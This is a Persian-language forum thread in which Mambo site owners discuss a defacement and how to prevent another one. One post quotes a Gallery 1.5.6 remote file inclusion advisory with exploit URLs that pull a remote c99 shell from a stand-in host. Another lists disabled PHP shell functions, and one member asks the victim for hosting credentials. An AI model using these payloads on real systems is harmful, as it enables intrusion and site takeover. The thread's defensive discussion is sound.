نمایش نسخه قابل چاپ
سلام
سایت من هک شد
TeamHacked By : Persian Boys Hacking TeamHacked
البته فقط یک مطلب را عوض کردند و نوشتند
TeamHacked By : Persian Boys Hacking TeamHacked و پسورد ادمین را هم عوض کردند.
چون مطلب استاتیک را ادیت کردند حدسم اینه که از طریق مامبو این کار را کردند نه از طریق سرور
[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
البته من الان اون مطلب را درست کردم.
حدس شما چیه؟ چی کار کنم که دوباره نتونند هک کنند؟!
سلام
ورژن مامبو ؟
یا علی
4-6-2
سلام
register_global آن هست یا آف ؟
اگر آن هست ممکن هست از طریق مامبو بوده باشه اما اگر آف احتمالش خیلی کم میشه
+ اینکه ممکن هست از طریق سرور اقدام به تغییر پسورد ادمین کرده باشند و سپس لاگین و تغییر متون
+ پسورد شما از طریق تروجان لو رفته باشه و ...
یا علی
ببخشید از کجا میشود فهمید که چه کسانی آخرین لحظات وارد شده بودند.
لاگ موجود در Cpanel + لاگ موجود در سرور
register_global اف هست
آیا از طریق مامبو میشود فهمید که آخرین بار کی وارد شده بوده؟
کسی که اینکار را کرده احتمالا مامبو را هم خوب بلد بوده نه؟
سلام
خیر ...
ورود به مدیریت و ادیت مطلب زیاد مشکل نیست ;)
شما چه کامپوننت هایی روی سایت نصب کرده بودید ؟
فولدر ادمین پسورد داشت ؟
یا علی
به همین سادگی محسن جان یک سایت هک میشه ؟!
منظورت رو دقیقا متوجه نمیشم ! توضیح بیشتر بده و سوال رو به صورت دقیق بپرس تا کامل جواب بدم
فولدر ادمین هم پسورد داشته، بله.
خوب کامپوننت های زیادی نصبه مثل ریموستری، سایت مپ،یوزر اکستندت و ..
من حدس میزنم که پسورد شما با روش هایی مثل کی لاگر ها و ... دزدیده شده باشه. چون قطعا وارد شدن به شاخه Administrator ربطی به مامبو نداره ;)
میتونید این مقاله من رو هم بخونید که شاید کمکتون کنه.
اميدوارم مورد استفاده قرار بگيره.
لطفا نظرات و پيشنهادات خودتون رو در خصوص این مقاله به من اعلام كنيد.
[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
ارادتمند.
سلام.سیامک جان زحمتی که کشیدین قابل تقدیره ;)
معمولا این گونه کتاب های الکترونیک مخصوصا اگه توسط فرد یا تیم متخصصی نوشته شده باشه خیلی می تونه کمک حال بچه ها باشه.مثل همین مقاله :)
من که از این مقاله لذت بردم.
یــــــــــــــــــــــــ ـــــــــاعــــــــــــــ ـــــــــــــلی
سلام
میدونم که نباید برای تشکر پست بدم ولی کار سیامک جان فوق العاده بود. :D
مطالب خیلی مفیدی که برای جمع آوریش زحمت زیادی کشیده اید . واقعا عالی بود.
از مقاله خوبت ممنون . بازم از این کارا بکن ;)
موفق باشید
امیر
من ندیدم چه تغیراتی دادن ولی احتمال میدم که از طریق باگ این کار رو کرده باشه و یک شلر آپلود کرده!!!! به سایت های زیر نگاه کنید.
این دوستمون از smf هم استفاده کرده.
[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
اینها هم قبلا توسط همین تیم هک شده
Attacker : Persian Boys Hacking Team
Domain : [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
Attacker : Persian Boys Hacking Team
Domain : [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
Attacker : Persian Boys Hacking Team
Domain : [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
Attacker : Persian Boys Hacking Team
Domain : [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
شما ببینید کدوم دایرکتوری ها پرمیژن 777 دارن.بعد محتویاتش رو بررسی کنید.
یا اینکه یه backup بگیرید و روی لوکال با یه آنتی ویروس up to date مثل کسپر اسکای اسکن کنید چون این آنتی ویروس شل اسکریپت ها رو میشناسه.
ببخشید یک شلر آپلود کرده یعنی چی؟
به smf چه ربطی داره
آیا هنوز هم میتونه هک کنه برای جلوگیری چه کنم
در بسیاری از مواقع در بعضی cms ها نوعی باگ پیدا میشه با نام RFI یا remote flie inclusion و از این دست....
با استفاده از این باگ ها نفوزکر میتونه یه یه اسکریپت رو روی سرویس دهنده اجرا کنه مثلا این یه نمونه از باگ های مشهور RFI برای
خوب البته CMS های اپن سورس بیشتر در معرض چنین باگ های هستند.نقل قول:
################################################## ######################
################################################## ############
#gallery >> 1.5.6 Remote File Inclusion #
#Affected Software : gallery >> 1.5.6 #
#Download..: [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
heanet&filename=gallery-1.5.6.tar.gz&66134343 #
#Risk ..............: high #
#Date .........: 24/4/2007 #
################################################## ######################
################################################## ############
#Affected File:
gallery/lib/content.php
gallery/lib/content.php
gallery/lib/content.php
gallery/lib/content.php
gallery/setup/frame_test.php
gallery/contrib/joomla/admin.gallery.php
gallery/contrib/joomla/toolbar.gallery.php
gallery/contrib/mambo/admin.gallery.php
gallery/contrib/mambo/toolbar.gallery.php
gallery/contrib/phpBB2/modules.php
gallery/contrib/phpBB2/modules.php
gallery/contrib/phpBB2/modules.php
gallery/contrib/phpnuke/modules.php.
gallery/contrib/phpnuke/modules.php.patch
################################################## ######################
################################################## ##############
# Exploit:
[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
?cmd=ls
gallery/lib/content.php?=http://shell/c99.txt?cmd=ls
gallery/lib/content.php?require=http://shell/c99.txt?cmd=ls
gallery/lib/content.php?=http://shell/c99.txt?cmd=ls
gallery/contrib/mambo/admin.gallery.php?require_once=http://shell/c99.tx
t?cmd=ls
gallery/contrib/mambo/toolbar.gallery.php?require_once=http://shell/c99.
txt?cmd=ls
#
#
################################################## ######################
################################################## #############
در کدهای بالبا اگر دقت کنید C99 اسم شلری است که برای این امر انتخاب شده که اگر نفوذگر حرفه ای باشد میتواند کل سرور را غبضه کند!!!
توصیه امنیتی: از مد ها و مامبوت های غیر معتبر استفاده نکنید چرا که این باگ ها از یک خطا در کد نویسی ناشی میشود عده زیادی هستند که مامبو را گسترش میدهند ولی جمع قلیلی به موارد امنیتی کد نویسی توجه دارند
این یک روش از هزاران روش مرسوم برای نفوذگری در وب بود
یا علی
ببخشید! برای جلوگیری الان راه حل ضد هک چیه باید چه مامبوت (غیر معتبر) را حذف کنیم
مطمئنان داشتن اکستنشن های اضاقی از امنتیت سی ام اس میاره پایین این چیزی هست که خود سی ام اس هم بهتون میگه
اما هاست خوب خیلی در این موارد تاثیر گذار هست
بله دوست عزیز سرور میزبان بسیار بسیار مهم هست
مثلا این رو ببینید
******
به این میگن شلر c99 همون طور که میبینید
با غیر فعال کردن فانکشن های اضافی روی سرور توسط مدیر امنیت سیتم تا حدود خیلی زیادی بالا رفته البته اونایی که خیلی حرفه ای هستند این محدودیت ها رو دور میزنند!!!کد:Disabled functions : exec,system,passthru,readfile,shell_exec,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,dl,popen,parse_ini_file,show_source
اگه cms ضعف امنیتی داشته باشه میشه مشابه این اسکریپت ها رو روش آپلود کرد یا این که فراخوانی کرد الباقیش دیگه هنر مدیر سرور هست که .....
**** مسیر C99 حذف شد ;)
یه چیز یادم رفت بگم انم پرمیژن بندی هست با یه پرمیژن بندی مناسب میشه کلی از حملات آماتوری و نیمه آماتوری رو خنثی کرد
این شلر رو هم چند روز دیگه پاک میکنم(صرفا جنبه آموزشی داشت)
سايت من هم توسط همين گروه هك شد.
ولي فكر نكنم به خاطر سرور باشه.چون من روي هاستم چند تا دامين ديگه دارم.
اين هم لينك اثبات:
[مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید]
دستان اینجا چه خبره؟ :(
سلام
چک کردم شما از مامبو 4.6.2 استفاده میکردید .
در 3 صورت ممکن هست هک شده باشید :
1- پسورد شما لو رفته باشه ( که احتمالش کمه )
2- سرور مشکلی داشته باشه
3- REGISTER GLOBAL = ON باشه
مورد 3 احتمالش خیلی بیشتر هست . این مورد رو چک کنید و به ما بگید .
یا علی
آره احتمالا همین سومی باشه !
منم جوملا نصب کرده بودم این مقدار رو رعایت نکردم! باور کنید شب خوابیدم صبح دیدم سایتمو هک کردند :(
1- فكر نكنم.چون اين گروه مامبوهاي ديگه اي رو هم هك كردن.
2-الان دو سه تا سايت ديگه هم روي هاستم دارم كه به اون ها كاري نداشتند.
امروز بعد از ظهر داشتم آمار وبگذر رو نگاه مي كردم كه ديدم يه نفر از سايت [مهمان/کاربر گرامی برای دیدن لینک ها ابتدا باید عضو سایت شوید و لاگین کنید برای ثبت نام اینجا کلیک کنید] آمدن تو سايتم.يه كم مشكوك شدم ولي وقتي به سايت مذكور رفتم چيزي از هك شدن سايتم نديدم.تا اينكه شب ديدم دوباره يكي از همين سايت آمده كه وقتي بر روي لينك كليك كردم ديدم كه ...!!! :'(
ولي در آمار ساير سايت هام كه روي همين هاست بوده رد پايي ازشون نبود!
3-اگه منظورتون register_globals هست آفه!
پسورد رو هم عوض كرده بودن كه از طريق فراموشي رمز عبور تونستم بدستش بيارم.
سلام
مشکل از مامبو قطعا نیست . همین سایت خود ما ... یا سایت کسایی که روی مامبوسرور هستند ... یا ... خدا رو شکر هیچ مشکلی نداشته و نداره ...
گزارشی از باگ در مامبو هم منتشر نشده ( در صورت آف بودن رجیستر گلوبال )
پیشنهاد میکنم با مدیر سرورتون صحبت کنید تا لاگها رو چک کنند و دقیقا بگن که مشکل از کجا بوده
یا علی
يه چيز جالب!
من هاستم رو از سايت گيتي هاست خريدم و سايت گيتي هاست هم يكي ز سايت هايي هست كه توسط اين گروه هك شده.
جالبيش اين جاست كه اين سايت هم از مامبو استفاده مي كنه!
[quote author=فیروزمندان link=topic=14473.msg79022#msg79022 date=1216145765]
سلام
مشکل از مامبو قطعا نیست . همین سایت خود ما ... یا سایت کسایی که روی مامبوسرور هستند ... یا ... خدا رو شکر هیچ مشکلی نداشته و نداره ...
گزارشی از باگ در مامبو هم منتشر نشده ( در صورت آف بودن رجیستر گلوبال )
پیشنهاد میکنم با مدیر سرورتون صحبت کنید تا لاگها رو چک کنند و دقیقا بگن که مشکل از کجا بوده
یا علی
[/quote]
سلام
اگر ممکن هست یوزرنیم + پسورد هاست رو بدید من چند مورد رو تست کنم
یا علی
آقا ببخشید من میپرم وسط بحث!
این روشن بودن رجیستر گلوبال چه مشکلی ایجاد میکنه؟
من که مسئول سرور نیستم! و نمیتونم این رجیستر رو خاموشش کنم، حالا باید چیکار کنم؟
موقع نصب مامبو نسخه 4.6.5 نوشته بود که رجیستر گلوبال روشن هست. آیا به جز خاموش کردنش توسط مسئول سرور راهی برای ما هست که از نفوذ جلوگیری کنیم؟
در فایل .htaccess
این کد را قرار دهید تا رجیستر گلوبال خاموش شود .
کد:php_flag register_globals off
ببخشید من مامبو رو رو روت هاست نصب نکردم بلکه تو یه فولدر نصب کردم.
تو اون فولدر هم همچین فایل نیست فقط یه فایل هست به اسم: htaccess.txt.45x
حالا باید چیکار کنم، یه فایل با این اسم بسازم؟ این فایل رو باید تو همون فولدری که مامبو نصب هست بزارم؟
اگه مهم هست نسخه سی پنل رو سرور یازده هست. ممکنه این فایل باشه و نشون نده؟ من اون اول که می پرسه گفتم فایلهای مخفی یعنی اون هایی که با . شروع می شن رو نشون بده ولی همچین فایلی نشون نمی ده.
سلام.معمولا یه فایل htaccess.txt توی حتما توی نسخه ی خام مامبو (بسته ی با فرمت زیپ) موجود هست.شما اون را آپلود کنید توی فولدر مامبوتون و بعد به htaccess. تغییر نامش بدید.
البته من یه نگاه انداختم دیدم مثل اینکه محتویات htaccess.4.5.txt یه فرق هایی با htaccess.txt داره.حالا نمی دونم اگه شما همون htaccess.4.5.txt را هم به htaccess. تغییر نام بدید همون کارایی را خواهد داشت یا نه. ولی فعلا برای اطمینان بهتره که همون فایل htaccess.txt را به htaccess. تغییر نام بدید.
:: از دوستان اگر کسی اطلاع دارین که تغییر نام htaccess.4.5.txt به htaccess. با تغییر نام htaccess.txt به .htaccess فرقی داره یا نه بفرمایین.
یــــــــــــــــــــــــ ـــــــــاعــــــــــــــ ـــــــــــــــــلی
سلام.... فکر کنم جواب سوال دوستمون رو اشتباهی در یک تاپیک دیگه دادم.... عذر می خوام ....لی باید بگم که بله فرق داره..... در مامبو 4.6.5 htaccess.txt یا htaccess. وجود نداره وباید اون رو درست کنید..... بهتره یک جستجو در سایت بکنید تاپیکش هست...
راستی میتونید از خود تنظیمات مدیریت سایت در بخش تنظیمات کلی و در تب سرور می تونید شبیه ساز Register Globals رو خاموش کنید و یا از طریق htaccess. که دوستمون اشاره کرد عمل کنید....
موفق و پیروز و پاینده باشید....
سلام
با مدير سرور تماس گرفتم،گفتن كه نفوذ از طريق mysql server بوده
فكر كنم به خاطر همين هم اكثرا سيستم هاي مامبو را هك كردن.
سلام
خوشحالم که بالاخره متوجه موضوع شدید .
اگر MySql مشکل داشته ربطی به سایت های مامبو یا ... نداره . این امکان فراهم میشه که تمام سایتهای که دیتابیس دارن هک بشن ...
یا علی
سلام به دوستان
میبینم که بحث داغه.
طبق شواهد و گفته دوستان اینگونه دسترسی به سایت و هک شدن از طریق SQL INJECTION انجام میشه و اگه هکرخان دسترسی از نوع SHELL داشته باشه دیگه نمیاد وقت خودشو واسه رمزگشایی برای پسورد HASH شده ادمین سایت بزاره و خیلی راحت سایت رو deface میکنه.حال اگه SHELL داشته باشه و پرمیشن فایلها و فولدرها به صورتی باشه که هکر نتونه هیچ تغیری در فایلها بده میاد پسورد ادمین رو میزنه و ادامه داستان...
هميشه هم اين طوري نيست ممكن هست طرف شل داشته باشه ولي پرميژن اديت كردن نداشته باشه.تو اين جور مواقع هكر تازه كار مياد از روي config يوزر و پس ديتابيس رو ميخونه و كانكت ميكنه به ديتابيس و...
خوب دوست عزیز من در اخر گفته ام همینو گفتم.